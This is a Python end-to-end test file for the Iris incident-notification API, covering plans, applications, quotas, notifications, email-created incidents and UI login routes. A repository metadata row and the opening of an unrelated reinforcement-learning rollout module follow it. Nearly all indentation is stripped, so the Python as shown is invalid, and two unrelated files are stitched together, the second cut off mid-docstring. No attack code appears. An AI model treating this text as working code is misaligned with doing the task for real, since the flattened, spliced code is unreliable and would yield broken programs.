[
{
'role': 'user',
'target': sample_user,
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
}
],
[
{
'role': 'manager',
'target': sample_team,
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
}
],
[
{
'role': 'user',
'target': 'noc',
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
}
],
],
]
for steps in invalid_steps:
_data = copy.deepcopy(data)
_data['steps'] = steps
re = requests.post(base_url + 'plans', json=_data)
assert re.status_code == 400
for steps in valid_steps:
_data = copy.deepcopy(data)
_data['steps'] = steps
re = requests.post(base_url + 'plans', json=_data)
assert re.status_code == 201
def test_get_applications(sample_application_name):
app_keys = set(['variables', 'required_variables', 'name', 'context_template', 'summary_template', 'sample_context', 'default_modes', 'supported_modes', 'owners'])
# TODO: insert application data before get
re = requests.get(base_url + 'applications/' + sample_application_name)
assert re.status_code == 200
app = re.json()
assert isinstance(app, dict)
assert set(app.keys()) == app_keys
re = requests.get(base_url + 'applications')
assert re.status_code == 200
apps = re.json()
assert isinstance(apps, list)
assert len(apps) > 0
for app in apps:
assert set(app.keys()) == app_keys
def test_update_reprioritization_settings(sample_user):
session = requests.Session()
session.headers = username_header(sample_user)
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '1', 'duration': '120'})
assert re.status_code == 200
re = session.get(base_url + 'users/reprioritization/' + sample_user)
assert re.status_code == 200
rules = re.json()
assert len(rules) == 1
rule = rules[0]
assert rule['src_mode'] == 'call'
assert rule['dst_mode'] == 'sms'
assert rule['count'] == 1
assert rule['duration'] == 120
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'fakesrc', 'dst_mode': 'sms', 'count': '1', 'duration': '120'})
assert re.json()['title'] == 'Invalid source mode.'
assert re.status_code == 400
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'fakedst', 'count': '1', 'duration': '120'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid destination mode.'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'missingargs': 'foo'})
assert re.status_code == 400
assert re.json()['title'] == 'Missing argument'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '1', 'duration': '1'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid duration'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '1', 'duration': '3601'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid duration'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '1', 'duration': 'fakeint'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid duration'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': 'fakeint', 'duration': '3600'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid count'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '-10', 'duration': '3600'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid count'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '300', 'duration': '3600'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid count'
def test_delete_reprioritization_settings(sample_user):
session = requests.Session()
session.headers = username_header(sample_user)
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '1', 'duration': '120'})
assert re.status_code == 200
re = session.get(base_url + 'users/reprioritization/' + sample_user)
assert re.status_code == 200
assert 'call' in set(rule['src_mode'] for rule in re.json())
re = session.delete(base_url + 'users/reprioritization/%s/call' % sample_user)
assert re.status_code == 200
re = session.get(base_url + 'users/reprioritization/' + sample_user)
assert re.status_code == 200
assert 'call' not in set(rule['src_mode'] for rule in re.json())
re = session.delete(base_url + 'users/reprioritization/%s/call' % sample_user)
assert re.status_code == 404
def test_get_modes():
re = requests.get(base_url + 'modes')
assert re.status_code == 200
data = re.json()
assert 'sms' in data
assert 'email' in data
assert 'call' in data
assert 'im' in data
assert 'drop' not in data
def test_get_target_roles():
re = requests.get(base_url + 'target_roles')
assert re.status_code == 200
data = re.json()
expected_set = set(['oncall-primary', 'manager', 'team', 'user', 'oncall-secondary'])
assert expected_set <= set([r['name'] for r in data])
def test_get_priorities():
re = requests.get(base_url + 'priorities')
assert re.status_code == 200
data = re.json()
data = set([d['name'] for d in data])
assert 'low' in data
assert 'medium' in data
assert 'high' in data
assert 'urgent' in data
def test_get_user(sample_user, sample_email, sample_admin_user):
re = requests.get(base_url + 'users/' + sample_user, headers=username_header(sample_user))
assert re.status_code == 200
data = re.json()
assert data.viewkeys() == {'teams', 'modes', 'per_app_modes', 'admin', 'contacts', 'name'}
assert data['contacts']['email'] == sample_email
assert data['name'] == sample_user
re = requests.get(base_url + 'users/' + sample_admin_user, headers=username_header(sample_admin_user))
assert re.status_code == 200
assert re.json()['admin'] is True
def test_healthcheck():
with open('/tmp/status', 'w') as f:
f.write('GOOD')
re = requests.get(server + 'healthcheck')
assert re.status_code == 200
assert re.content == 'GOOD'
def test_stats():
re = requests.get(base_url + 'stats')
assert re.status_code == 200
data = re.json()
for key in ('total_active_users', 'total_messages_sent_today', 'total_incidents_today', 'total_messages_sent',
'total_incidents', 'total_plans', 'pct_incidents_claimed_last_month', 'median_seconds_to_claim_last_month'):
assert key in data
assert data[key] is None or isinstance(data[key], int) or isinstance(data[key], float)
re = requests.get(base_url + 'stats?fields=total_active_users&fields=total_plans')
assert re.status_code == 200
assert re.json().viewkeys() == {'total_active_users', 'total_plans'}
re = requests.get(base_url + 'stats?fields=fakefield')
assert re.status_code == 200
assert re.json() == {}
def test_app_stats(sample_application_name):
re = requests.get(base_url + 'applications/sfsdf232423fakeappname/stats')
assert re.status_code == 404
re = requests.get(base_url + 'applications/%s/stats' % sample_application_name)
assert re.status_code == 200
data = re.json()
for key in ('total_incidents_today', 'total_messages_sent_today',
'pct_incidents_claimed_last_month', 'median_seconds_to_claim_last_month',
'total_incidents_last_month', 'total_messages_sent_last_month',
'pct_call_fail_last_month', 'pct_call_success_last_month', 'pct_call_other_last_month',
'pct_sms_fail_last_month', 'pct_sms_success_last_month', 'pct_sms_other_last_month',
'pct_email_fail_last_month', 'pct_email_success_last_month', 'pct_email_other_last_month'):
assert data[key] is None or isinstance(data[key], int) or isinstance(data[key], float)
def test_post_notification(sample_user, sample_application_name):
# The iris-api in this case will send a request to iris-sender's
# rpc endpoint. Don't bother if sender isn't working.
try:
sock = socket.socket()
sock.connect(sender_address)
sock.close()
except socket.error:
pytest.skip('Skipping this test as sender is not running/reachable.')
re = requests.post(base_url + 'notifications', json={})
assert re.status_code == 400
assert 'Missing required atrributes' in re.text
re = requests.post(base_url + 'notifications', json={
'role': 'user',
'target': sample_user,
'subject': 'test',
})
assert re.status_code == 400
assert 'Both priority and mode are missing' in re.text
re = requests.post(base_url + 'notifications', json={
'role': 'user',
'target': sample_user,
'subject': 'test',
'priority': 'fakepriority'
})
assert re.status_code == 400
assert 'Invalid priority' in re.text
re = requests.post(base_url + 'notifications', json={
'role': 'user',
'target': sample_user,
'subject': 'test',
'mode': 'fakemode'
})
assert re.status_code == 400
assert 'Invalid mode' in re.text
re = requests.post(base_url + 'notifications', json={
'role': 'user',
'target': sample_user,
'subject': 'test',
'priority': 'low'
}, headers={'authorization': 'hmac %s:boop' % sample_application_name})
assert re.status_code == 200
assert re.text == '[]'
def test_modify_applicaton_quota(sample_application_name, sample_admin_user, sample_plan_name):
if not all([sample_application_name, sample_admin_user, sample_plan_name]):
pytest.skip('We do not have enough data in DB to do this test')
body = {
'hard_quota_threshold': 5,
'soft_quota_threshold': 3,
'hard_quota_duration': 60,
'soft_quota_duration': 60,
'plan_name': sample_plan_name,
'target_name': sample_admin_user,
'wait_time': 10
}
re = requests.post(base_url + 'applications/%s/quota' % sample_application_name, json=body, headers=username_header(sample_admin_user))
assert re.status_code == 201
re = requests.get(base_url + 'applications/%s/quota' % sample_application_name)
assert re.status_code == 200
data = re.json()
assert all(data[key] == body[key] for key in body)
body['hard_quota_duration'] = 66
body['soft_quota_duration'] = 65
re = requests.post(base_url + 'applications/%s/quota' % sample_application_name, json=body, headers=username_header(sample_admin_user))
assert re.status_code == 201
re = requests.get(base_url + 'applications/%s/quota' % sample_application_name)
assert re.status_code == 200
data = re.json()
assert all(data[key] == body[key] for key in body)
re = requests.delete(base_url + 'applications/%s/quota' % sample_application_name, headers=username_header(sample_admin_user))
assert re.status_code == 204
re = requests.get(base_url + 'applications/%s/quota' % sample_application_name)
assert re.status_code == 200
assert re.json() == {}
def test_modify_application(sample_application_name, sample_admin_user, sample_user, sample_mode, sample_priority):
if not all([sample_application_name, sample_admin_user, sample_user, sample_mode]):
pytest.skip('We do not have enough data in DB to do this test')
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
current_settings = re.json()
temp_test_variable = 'testvar2'
if temp_test_variable not in current_settings['variables']:
current_settings['variables'].append(temp_test_variable)
try:
json.loads(current_settings['sample_context'])
except ValueError:
current_settings['sample_context'] = '{}'
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
assert set(re.json()['variables']) == set(current_settings['variables'])
current_settings['variables'] = list(set(current_settings['variables']) - {temp_test_variable})
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
assert set(re.json()['variables']) == set(current_settings['variables'])
current_settings['sample_context'] = 'sdfdsf234234'
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'sample_context must be valid json'
# Take sample_user out of list of owners and set that
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
current_settings = re.json()
current_settings['owners'] = list(set(current_settings['owners']) - {sample_user})
assert sample_user not in current_settings['owners']
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Verify that user isn't there
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert sample_user not in re.json()['owners']
# add it back to the list of owners and ensure it's there
current_settings['owners'] = list(set(current_settings['owners']) | {sample_user})
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
current_settings = re.json()
assert sample_user in current_settings['owners']
# Same for mode
current_settings['supported_modes'] = list(set(current_settings['supported_modes']) - {sample_mode})
assert sample_mode not in current_settings['supported_modes']
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Verify that mode isn't there
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert sample_mode not in re.json()['supported_modes']
# Put it back and verify
current_settings['supported_modes'] = list(set(current_settings['supported_modes']) | {sample_mode})
assert sample_mode in current_settings['supported_modes']
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Verify that mode is there
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert sample_mode in re.json()['supported_modes']
# Same for default mode per priority per this app
# Wipe the default modes
current_settings['default_modes'] = {}
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Verify none are set
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.json()['default_modes'] == {}
# Set one
current_settings['default_modes'] = {sample_priority: sample_mode}
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
    # Verify it's set
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.json()['default_modes'] == {sample_priority: sample_mode}
assert re.status_code == 200
def test_create_application(sample_admin_user, sample_application_name):
if not all([sample_admin_user, sample_application_name]):
pytest.skip('We do not have enough data in DB to do this test')
re = requests.post(base_url + 'applications', json={'name': sample_application_name}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'This app already exists'
temp_app_name = 'e2e-temp-app'
# Ensure the app doesn't exist before we begin
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('''DELETE FROM `application` WHERE `name` = %s''', temp_app_name)
conn.commit()
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 400
assert re.json()['title'] == 'Application %s not found' % temp_app_name
re = requests.post(base_url + 'applications', json={'name': temp_app_name}, headers=username_header(sample_admin_user))
assert re.status_code == 201
assert re.json()['id']
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 200
# Ensure the random key got created correctly
re = requests.get(base_url + 'applications/%s/key' % temp_app_name, headers=username_header(sample_admin_user))
assert re.status_code == 200
assert len(re.json()['key']) == 64
# Kill the temp app
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('''DELETE FROM `application` WHERE `name` = %s''', temp_app_name)
conn.commit()
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 400
assert re.json()['title'] == 'Application %s not found' % temp_app_name
def test_rename_application(sample_admin_user, sample_application_name, sample_application_name2):
if not all([sample_admin_user, sample_application_name, sample_application_name2]):
pytest.skip('We do not have enough data in DB to do this test')
temp_app_name = 'e2e-rename-app'
# Test the sanity checks
re = requests.put(base_url + 'applications/%s/rename' % temp_app_name, json={'new_name': temp_app_name}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'New and old app name are identical'
re = requests.put(base_url + 'applications/fakeapp123/rename', json={'new_name': temp_app_name}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'No rows changed; old app name incorrect'
# Rename our sample app to the new temp name
re = requests.put(base_url + 'applications/%s/rename' % sample_application_name, json={'new_name': temp_app_name}, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 200
# Ensure the old version doesn't exist anymore
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 400
assert re.json()['title'] == 'Application %s not found' % sample_application_name
# Put it back now
re = requests.put(base_url + 'applications/%s/rename' % temp_app_name, json={'new_name': sample_application_name}, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
# Ensure we can't rename over another app
re = requests.put(base_url + 'applications/%s/rename' % sample_application_name, json={'new_name': sample_application_name2}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'Destination app name likely already exists'
def test_delete_application(sample_admin_user):
if not sample_admin_user:
pytest.skip('We do not have enough data in DB to do this test')
temp_app_name = 'e2e-delete-app'
# Ensure we don't already have it
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('''DELETE FROM `application` WHERE `name` = %s''', temp_app_name)
conn.commit()
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 400
assert re.json()['title'] == 'Application %s not found' % temp_app_name
# Create application
re = requests.post(base_url + 'applications', json={'name': temp_app_name}, headers=username_header(sample_admin_user))
assert re.status_code == 201
assert re.json()['id']
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 200
# Delete it
re = requests.delete(base_url + 'applications/%s' % temp_app_name, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Is it really gone?
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 400
assert re.json()['title'] == 'Application %s not found' % temp_app_name
def test_view_app_key(sample_application_name, sample_admin_user):
re = requests.get(base_url + 'applications/%s/key' % sample_application_name)
assert re.status_code == 401
assert re.json()['title'] == 'You must be a logged in user to view this app\'s key'
re = requests.get(base_url + 'applications/fakeapp124324/key', headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'Key for this application not found'
re = requests.get(base_url + 'applications/%s/key' % sample_application_name, headers=username_header(sample_admin_user))
assert re.status_code == 200
assert re.json().viewkeys() == {'key'}
def test_twilio_delivery_update(fake_message_id):
if not fake_message_id:
pytest.skip('We do not have enough data in DB to do this test')
    # Use a random hex string as a stand-in for a Twilio message SID
message_sid = uuid.uuid4().hex
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('''INSERT INTO `twilio_delivery_status` (`twilio_sid`, `message_id`)
VALUES (%s, %s)''', (message_sid, fake_message_id))
conn.commit()
re = requests.post(base_url + 'twilio/deliveryupdate', data={'MessageSid': message_sid, 'MessageStatus': 'delivered'})
assert re.status_code == 204
re = requests.get(base_url + 'messages/%s' % fake_message_id)
assert re.status_code == 200
assert re.json()['twilio_delivery_status'] == 'delivered'
def test_configure_email_incidents(sample_application_name, sample_application_name2, sample_plan_name, sample_email, sample_admin_user):
# Test wiping incident email addresses for an app
re = requests.put(base_url + 'applications/%s/incident_emails' % sample_application_name, json={}, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s/incident_emails' % sample_application_name)
assert re.status_code == 200
assert re.json() == {}
# Block trying to set a users email to create an incident
re = requests.put(base_url + 'applications/%s/incident_emails' % sample_application_name, json={sample_email: sample_plan_name}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'These email addresses are also user\'s email addresses which is not allowed: %s' % sample_email
special_email = '[email protected]'
# Test setting an email address + plan name combination for an app successfully
re = requests.put(base_url + 'applications/%s/incident_emails' % sample_application_name, json={special_email: sample_plan_name}, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s/incident_emails' % sample_application_name)
assert re.status_code == 200
assert re.json()[special_email] == sample_plan_name
# Block one application stealing another application's email
re = requests.put(base_url + 'applications/%s/incident_emails' % sample_application_name2, json={special_email: sample_plan_name}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'These email addresses are already in use by another app: %s' % special_email
def test_create_incident_by_email(sample_application_name, sample_plan_name, sample_admin_user):
    if not all([sample_application_name, sample_plan_name, sample_admin_user]):
pytest.skip('We do not have enough data in DB to do this test')
special_email = '[email protected]'
# Ensure this email is configured properly.
re = requests.put(base_url + 'applications/%s/incident_emails' % sample_application_name, json={special_email: sample_plan_name}, headers=username_header(sample_admin_user))
assert re.status_code == 200
email_make_incident_payload = {
'body': 'This is a new test incident with a test message to be delivered to people.',
'headers': [
{'name': 'From', 'value': '[email protected]'},
{'name': 'To', 'value': special_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=email_make_incident_payload)
assert re.status_code == 204
assert re.headers['X-IRIS-INCIDENT'].isdigit()
re = requests.get(base_url + 'incidents/%s' % re.headers['X-IRIS-INCIDENT'])
assert re.status_code == 200
data = re.json()
assert data['context']['body'] == email_make_incident_payload['body']
assert data['context']['email'] == special_email
assert data['application'] == sample_application_name
assert data['plan'] == sample_plan_name
# Try it again with a customized fancy To header
email_make_incident_payload = {
'body': 'This is a new test incident with a test message to be delivered to people.',
'headers': [
{'name': 'From', 'value': '[email protected]'},
{'name': 'To', 'value': 'Email Mailing List Of Doom <%s>' % special_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=email_make_incident_payload)
assert re.status_code == 204
assert re.headers['X-IRIS-INCIDENT'].isdigit()
    # Also try creating an incident with an email that's a reply to the thread, which shouldn't work
email_make_incident_payload = {
'body': 'This string should not become an incident',
'headers': [
{'name': 'From', 'value': '[email protected]'},
{'name': 'To', 'value': special_email},
{'name': 'Subject', 'value': 'fooject'},
{'name': 'In-Reply-To', 'value': 'messagereference'},
]
}
re = requests.post(base_url + 'response/gmail', json=email_make_incident_payload)
assert re.status_code == 204
assert re.headers['X-IRIS-INCIDENT'] == 'Not created'
def test_ui_routes(sample_user, sample_admin_user):
# When not logged in, various pages redirect to login page
re = requests.get(ui_url + 'user', allow_redirects=False)
assert re.status_code == 302
assert re.headers['Location'] == '/login/?next=%2Fuser'
re = requests.get(ui_url + 'incidents', allow_redirects=False)
assert re.status_code == 302
assert re.headers['Location'] == '/login/?next=%2Fincidents'
re = requests.get(ui_url, allow_redirects=False)
assert re.status_code == 302
assert re.headers['Location'] == '/login/'
# And login page displays itself
re = requests.get(ui_url + 'login', allow_redirects=False)
assert re.status_code == 200
# And allows itself to work & login & set the beaker session cookie
re = requests.post(ui_url + 'login', allow_redirects=False, data={'username': sample_user, 'password': 'foo'})
assert re.status_code == 302
assert re.headers['Location'] == '/incidents'
assert 'iris-auth' in re.cookies
# Similarly it obeys the next GET param
re = requests.post(ui_url + 'login/?next=%2Fuser', allow_redirects=False, data={'username': sample_user, 'password': 'foo'})
assert re.status_code == 302
assert re.headers['Location'] == '/user'
assert 'iris-auth' in re.cookies
# When logged in, home page redirects to /incidents
re = requests.get(ui_url, allow_redirects=False, headers=username_header(sample_user))
assert re.status_code == 302
assert re.headers['Location'] == '/incidents'
# And other pages display themselves, and have the username specified in javascript
re = requests.get(ui_url + 'incidents', allow_redirects=False, headers=username_header(sample_user))
assert re.status_code == 200
assert re.headers['content-type'] == 'text/html'
assert ' appData.user = "%s";' % sample_user in re.text
# When passed an admin user, the admin flag should be "true"
re = requests.get(ui_url + 'incidents', allow_redirects=False, headers=username_header(sample_admin_user))
assert re.status_code == 200
assert re.headers['content-type'] == 'text/html'
assert ' appData.user = "%s";' % sample_admin_user in re.text
assert ' appData.user_admin = true;' in re.text
# And logout redirects to login page
re = requests.get(ui_url + 'logout', allow_redirects=False, headers=username_header(sample_user))
assert re.status_code == 302
assert re.headers['Location'] == '/login'
# And login redirects to home page
re = requests.get(ui_url + 'login', allow_redirects=False, headers=username_header(sample_user))
assert re.status_code == 302
assert re.headers['Location'] == '/incidents'
# Test actual login + logout session using beaker's cookies in requests session, rather than using the header trick:
session = requests.Session()
re = session.post(ui_url + 'login', allow_redirects=False, data={'username': sample_user, 'password': 'foo'})
assert re.status_code == 302
assert re.headers['Location'] == '/incidents'
assert 'iris-auth' in session.cookies
re = session.get(ui_url + 'incidents', allow_redirects=False)
assert re.status_code == 200
assert re.headers['content-type'] == 'text/html'
assert ' appData.user = "%s";' % sample_user in re.text
re = session.get(ui_url + 'logout', allow_redirects=False)
assert re.status_code == 302
assert re.headers['Location'] == '/login'
assert 'iris-auth' not in session.cookies
def test_ui_assets():
re = requests.get(ui_url + 'static/images/iris.png', allow_redirects=False)
assert re.status_code == 200
assert re.headers['content-type'] == 'image/png'
re = requests.get(ui_url + 'static/bundles/iris.css', allow_redirects=False)
assert re.status_code == 200
assert re.headers['content-type'] == 'text/css'
re = requests.get(ui_url + 'static/bundles/iris.js', allow_redirects=False)
assert re.status_code == 200
assert re.headers['content-type'] == 'text/javascript'
re = requests.get(ui_url + 'static/fonts/glyphicons-halflings-regular.woff', allow_redirects=False)
assert re.status_code == 200
assert re.headers['content-type'] == 'application/font-woff'
@pytest.mark.skip(reason="Re-enable this when we don't hard-code primary keys")
class TestDelete(object):
def setup_method(self, method):
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute("INSERT INTO template(`id`, `name`, `created`, `user_id`)"
"VALUES (1, 'foobar', '2015-09-25 22:54:31', 8)")
cursor.execute("INSERT INTO plan(`id`, `name`, `created`, `user_id`, `step_count`)"
"VALUES (2, 'foobar', '2015-09-25 22:54:31', 8, 3)")
cursor.execute("INSERT INTO plan_active (`name`, `plan_id`) VALUES ('foobar', 2)")
cursor.execute("INSERT INTO message(`id`, `created`, `application_id`, "
"`target_id`, `plan_id`, `priority_id`, `template_id`)"
"VALUES (1, '2015-09-25 22:54:31', 8, 8, 2, 8, 1)")
cursor.execute("INSERT INTO plan_notification(id, plan_id, step, template_id, target_id, role_id, priority_id)"
"VALUES (1, 2, 1, 1, 8, 8, 8)")
cursor.execute("INSERT INTO incident(`id`, `plan_id`, `created`, `application_id`, `current_step`, `active`)"
"VALUES (1, 2, '2015-09-25 22:54:31', 8, 1, 1)")
conn.commit()
def teardown_method(self, method):
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute("DELETE FROM plan_notification WHERE id = 1")
cursor.execute("DELETE FROM message WHERE id = 1")
cursor.execute("DELETE FROM incident WHERE id = 1")
cursor.execute("DELETE FROM plan_active WHERE plan_id = 2")
cursor.execute("DELETE FROM template WHERE id = 1")
cursor.execute("DELETE FROM plan WHERE id = 2")
conn.commit()
def test_delete_template(self):
# Test for correct error output
runner = CliRunner()
result = runner.invoke(iris_ctl.template, ['delete', 'foobar', '--config=../configs/config.dev.yaml'], input='y\n')
assert result.exit_code == 1
assert 'messages with ids:\n[1]' in result.output_bytes
assert 'plans with ids:\n[2]' in result.output_bytes
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
# Test failure with only message referencing template
cursor.execute("DELETE FROM plan_notification WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.template, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
assert result.exit_code == 1
# Test failure with only plan referencing template
cursor.execute("INSERT INTO plan_notification(id, plan_id, step, template_id, target_id, role_id, priority_id)"
"VALUES (1, 29, 1, 1, 8, 8, 8)")
cursor.execute("DELETE FROM message WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.template, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
assert result.exit_code == 1
# Test success
cursor.execute("DELETE FROM plan_notification WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.template, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
cursor.execute("SELECT id FROM template WHERE name = 'foobar'")
assert cursor.rowcount == 0
assert result.exit_code == 0
def test_delete_plan(self):
# Test for correct error output
runner = CliRunner()
result = runner.invoke(iris_ctl.plan, ['delete', 'foobar', '--config=../configs/config.dev.yaml'], input='y\n')
assert result.exit_code == 1
assert 'messages with ids:\n[1]' in result.output_bytes
assert 'incidents with ids:\n[1]' in result.output_bytes
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
# Test failure with only message referencing plan
cursor.execute("DELETE FROM incident WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.plan, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
assert result.exit_code == 1
# Test failure with only incident referencing plan
cursor.execute("INSERT INTO incident(`id`, `plan_id`, `created`, `application_id`, `current_step`, `active`)"
"VALUES (1, 2, '2015-09-25 22:54:31', 8, 1, 1)")
cursor.execute("DELETE FROM message WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.plan, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
assert result.exit_code == 1
# Test success
cursor.execute("DELETE FROM incident WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.plan, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
cursor.execute("SELECT id FROM plan WHERE name = 'foobar'")
assert cursor.rowcount == 0
cursor.execute("SELECT plan_id FROM plan_active WHERE name ='foobar'")
assert cursor.rowcount == 0
cursor.execute("SELECT id FROM plan_notification WHERE plan_id = 2")
assert result.exit_code == 0
| bsd-2-clause | -1,747,274,331,694,743,600 | 37.60488 | 178 | 0.595624 | false |
derekjchow/models | research/brain_coder/common/rollout.py | 5 | 12091 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
"""Utilities related to computing training batches from episode rollouts.
Implementations here are based on code from OpenAI:
https://github.com/openai/universe-starter-agent/blob/master/a3c.py.
"""
from collections import namedtuple
import numpy as np
import scipy.signal
from common import utils # brain coder
class Rollout(object):
"""Holds a rollout for an episode.
A rollout is a record of the states observed in some environment and actions
taken by the agent to arrive at those states. Other information includes
rewards received after each action, values estimated for each state, whether
  the rollout concluded the episode, and the total reward received. Everything
should be given in time order.
At each time t, the agent sees state s_t, takes action a_t, and then receives
reward r_t. The agent may optionally estimate a state value V(s_t) for each
state.
For an episode of length T:
states = [s_0, ..., s_(T-1)]
actions = [a_0, ..., a_(T-1)]
rewards = [r_0, ..., r_(T-1)]
values = [V(s_0), ..., V(s_(T-1))]
Note that there is an extra state s_T observed after taking action a_(T-1),
but this is not included in the rollout.
  Rollouts have a `terminated` attribute which is True when the rollout is
"finalized", i.e. it holds a full episode. terminated will be False when
time steps are still being added to it.
"""
def __init__(self):
self.states = []
self.actions = []
self.rewards = []
self.values = []
self.total_reward = 0.0
self.terminated = False
def add(self, state, action, reward, value=0.0, terminated=False):
"""Add the next timestep to this rollout.
Args:
state: The state observed at the start of this timestep.
action: The action taken after observing the given state.
reward: The reward received for taking the given action.
value: The value estimated for the given state.
terminated: Whether this timestep ends the episode.
Raises:
      ValueError: If self.terminated is already True, meaning that the episode
has already ended.
"""
if self.terminated:
raise ValueError(
'Trying to add timestep to an already terminal rollout.')
self.states += [state]
self.actions += [action]
self.rewards += [reward]
self.values += [value]
self.terminated = terminated
self.total_reward += reward
def add_many(self, states, actions, rewards, values=None, terminated=False):
"""Add many timesteps to this rollout.
Arguments are the same as `add`, but are lists of equal size.
Args:
states: The states observed.
actions: The actions taken.
rewards: The rewards received.
values: The values estimated for the given states.
terminated: Whether this sequence ends the episode.
Raises:
ValueError: If the lengths of all the input lists are not equal.
